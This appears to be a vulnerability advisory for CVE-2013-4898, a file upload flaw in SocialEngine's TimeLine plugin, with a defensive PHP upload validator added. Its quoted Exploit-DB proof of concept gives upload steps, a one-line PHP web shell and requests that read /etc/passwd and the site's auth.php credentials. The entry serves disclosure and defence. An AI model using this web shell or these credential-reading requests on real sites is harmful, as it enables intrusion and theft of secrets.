SocialEngine TimeLine plugin permissions and access control vulnerability

Vulnerability ID: 1121800  Type: permissions, privileges and access control
Published: 2013-08-02  Updated: 2013-08-05
CVE: CVE-2013-4898  CNNVD ID: CNNVD-201308-083
Platform: PHP  CVSS score: 6.5
|Sources
https://www.exploit-db.com/exploits/27272
https://www.securityfocus.com/bid/61622
https://cxsecurity.com/issue/WLB-2014020033
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-083
|Details
SocialEngine is a PHP-based social networking platform developed by the US-based SocialEngine team. TimeLine is a timeline plugin for it that records when articles, photos, videos and other content are published. The 'userprofile' page of SocialEngine TimeLine plugin version 4.2.5p9 contains an arbitrary file upload vulnerability. A remote attacker can exploit it to execute arbitrary code by uploading a file with an executable extension to the public/temporary/timeline/ directory.
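The hardening a defender would want for the behaviour described above, as an added example (PHP 8) that is not SocialEngine or TimeLine code: the upload is sniffed rather than trusted by extension, the stored name is generated server-side, and a rejected file is deleted on every path instead of being left under public/temporary/timeline/. The class and method names and the non-executable storage directory are assumptions.

```php
<?php
// Added example, not SocialEngine or TimeLine code. Only the storage path and
// the "cover_original_<id>" naming come from the advisory; all else is assumed.
declare(strict_types=1);
final class CoverUploadValidator
{
    /** Sniffed MIME type => extension the stored file is allowed to carry. */
    private const ALLOWED = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];

    // $storageDir must not execute scripts: outside the document root, or
    // with the PHP handler disabled for that directory.
    public function __construct(private string $storageDir) {}

    /** Validate one $_FILES entry and store it. Throws on any failure; the temp
     *  file is deleted before the exception leaves, so nothing rejected remains. */
    public function accept(array $file, int $userId): string
    {
        try {
            if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
                || !is_uploaded_file($file['tmp_name'] ?? '')) {
                throw new RuntimeException('no valid upload');
            }
            // Sniff the real content; the client-supplied filename and
            // $file['type'] are attacker controlled and never consulted.
            $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
            $ext  = self::ALLOWED[$mime] ?? null;
            if ($ext === null || getimagesize($file['tmp_name']) === false) {
                throw new RuntimeException('not an accepted image');
            }
            // Server-generated name: no user input reaches the path or extension.
            $dest = sprintf('%s/cover_original_%d.%s', $this->storageDir, $userId, $ext);
            if (!move_uploaded_file($file['tmp_name'], $dest)) {
                throw new RuntimeException('could not store image');
            }
            return $dest;
        } finally {
            // The advisory's bug was a rejected file left on disk; remove it
            // on every exit path (after a successful move it is already gone).
            if (isset($file['tmp_name']) && is_file($file['tmp_name'])) {
                unlink($file['tmp_name']);
            }
        }
    }
}
```

Pair this with a web-server rule that refuses to execute scripts under public/temporary/, so a file that slips through is served as data rather than run.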
|Exploit
# Exploit Title: Sending php file in the timeline plugin cover image of SocialEngine 4.5 
# Date: 2013-08-17 
# Discovered by: Wesley Henrique Leite aka "spyk2r" 
# Vendor Homepage: http://webhive.com.ua/
# Software Link: http://webhive.com.ua/store/product.php?id_product=46
# Version: plugin Timeline 4.2.5p9 for SocialEngine 4.5 
# Vendor Notified: 2013-08-17
# CVE Notified: 2013-08-24
# CVE : CVE-2013-4898


+ INTRODUCTION

The plugin has the objective of giving you a better visual for the user
profile, allowing the addition of a cover image and keeping the layout closest
to the style of modern social networks, among other features.

+ DESCRIPTION OF VULNERABILITY

Logged into the system, enter the profile page of your user. [my profile]

    http://[url]/index.php/profile/[profile-name]

    >> Click "Change Cover"

    >> Click "Upload Cover"

Select the file "*.php" you want to send.

//### Example PHP file to send "inject.php" ### 
    <?php echo system("$_GET['cmd']"); ?> 
//###

After selecting the file to upload, it will be sent to a temporary area;
the system detects that the format is not valid but doesn't remove it,
allowing access later.

An error message is displayed on the screen.

[ File "/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php" 
is not an image or does not exist ]

+ ACCESS

    /srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php

The important thing is the structure from public onward, as it will give
us access to our archive.

    http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd

    http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php
|Affected products
Social Engine TimeLine 4.2.5p9
|References

Source: BUGTRAQ
Name: 20130805 SocialEngine 4.5 TimeLine 4.2.5p9 upload file "PHP" in the Cover Image
Link: http://www.securityfocus.com/archive/1/527791
Source: EXPLOIT-DB
Name: 27272
Link: http://www.exploit-db.com/exploits/27272/
Source: BID
Name: 61622
Link: http://www.securityfocus.com/bid/61622